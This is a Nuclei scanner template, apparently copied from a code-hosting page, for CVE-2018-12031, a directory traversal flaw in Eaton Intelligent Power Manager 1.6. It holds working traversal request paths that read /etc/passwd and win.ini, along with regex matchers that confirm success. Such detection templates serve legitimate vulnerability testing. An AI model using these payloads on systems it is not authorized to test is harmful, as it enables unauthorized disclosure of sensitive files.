38 lines
1.2 KiB
YAML
38 lines
1.2 KiB
YAML
id: CVE-2018-12031
|
|
|
|
info:
|
|
name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
|
|
author: daffainfo
|
|
severity: critical
|
|
description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.
|
|
reference:
|
|
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
|
|
- https://www.exploit-db.com/exploits/48614
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-12031
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2018,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
|
|
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- "\\[(font|extension|file)s\\]"
|
|
condition: or
|
|
part: body
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/05/12
|